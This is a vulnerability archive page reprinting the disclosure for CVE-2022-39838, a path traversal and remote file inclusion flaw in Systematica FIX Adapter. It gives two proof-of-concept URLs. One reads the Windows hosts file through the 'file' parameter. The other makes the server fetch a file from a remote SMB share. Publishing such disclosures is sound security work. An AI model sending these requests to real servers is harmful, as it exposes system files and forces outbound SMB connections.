Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2022-39838 PoC — Systematic Alpha Management FIX Adapter 路径遍历漏洞

Source
Associated Vulnerability
Title:Systematic Alpha Management FIX Adapter 路径遍历漏洞 (CVE-2022-39838)
Description:Systematic FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames.
Readme
# CVE-2022-39838
## [Suggested description]
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via
a UNC share pathname, and also allows absolute path traversal to local pathnames.

## [Additional Information]
PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt


## [Vulnerability Type]
Incorrect Access Control


## [Vendor of Product]
Systematica


## [Affected Product Code Base]
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)


## [Attack Type]
Remote


## [Impact Information Disclosure]
true


## [Attack Vectors]
Remote user can get access to arbitrary file in the OS via absolute path.
Also remote user can compel vulnerable server to request file from another machine over smb.


## [Discoverer]
Ivashchenko Sergey (Jet Infosystems, jet.su)


## [Reference]
http://systematicalpha.com/company
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →